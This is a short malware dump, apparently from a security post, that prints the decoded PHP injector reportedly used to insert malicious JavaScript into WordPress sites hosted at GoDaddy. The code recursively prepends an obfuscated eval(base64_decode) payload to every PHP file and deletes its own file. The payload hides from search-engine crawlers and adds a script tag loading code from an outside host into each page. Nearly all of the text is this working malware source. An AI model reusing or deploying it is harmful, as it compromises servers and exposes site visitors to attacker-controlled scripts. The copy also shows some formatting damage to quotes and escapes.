Description: Code used to insert a malicious javascript on many
wordpress sites at GoDaddy.
Malware dump:
Decoded dump:
set_time_limit(0);
function inject($f,$inj){
global $totalinjected;
$c = file_get_contents($f);
if (strstr($c,”r57shell”)) return;
if (strstr($c,”@zend”)) return;
if (strstr($c,’<?php /**/ eval(base64_decode(‘)) return;
if (substr($c,0,10)==’<?php /**/’){
$k=strpos($c,’?>’)+2;
$c=substr($c,$k);
}
$c = $inj.$c;
$h2 = @fopen ($f, “w”);@fwrite($h2, $c);@fclose($h2);
$totalinjected++;
}
function inject_in_folder($dir){
global $encoded;
if (is_dir($dir)) {
if ($dh = @opendir($dir)) {
while (($file = @readdir($dh)) !== false) {
if (($file==”.”)||($file==”..”))continue;
$k=$dir.”/”.$file;
if (is_dir($k)){
inject_in_folder($k);
}else{
if (is_file($k)){
$ext=explode(“.”,$k);
$c=count($ext)-1;
if (strtolower($ext[$c])==”php”){
inject($k,$encoded.”n”);
}
}
}
}
@closedir($dh);
}
}
}
$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);
$cod=base64_encode(‘<script src=”http://holasionweb.com/oo.php”></script>’);
$to_pack=’if(function_exists(‘ob_start’)&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists(‘mrobh’)){ if(!function_exists(‘gml’)){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&& (!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))){ return base64_decode(“‘.$cod.’”); } return “”; } } if(!function_exists(‘gzdecode’)){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack(‘v’,substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header(‘Content-Encoding: none’); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match(‘/</body/si’,$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace(‘/(</body[^>]*>)/si’,gml().”n”.’$1′,$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start(‘mrobh’); } }’;
$to_pack=base64_encode($to_pack);
$encoded=’<?php /**/ eval(base64_decode(“‘.$to_pack.’”));?>’;
$val=dirname($z);
$totalinjected=0;
echo “Working with $valn”;
$start_time=microtime(true);
if ($val!=”")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
echo “|Injected| $totalinjected files in $end_time secondsn”;
Loading 
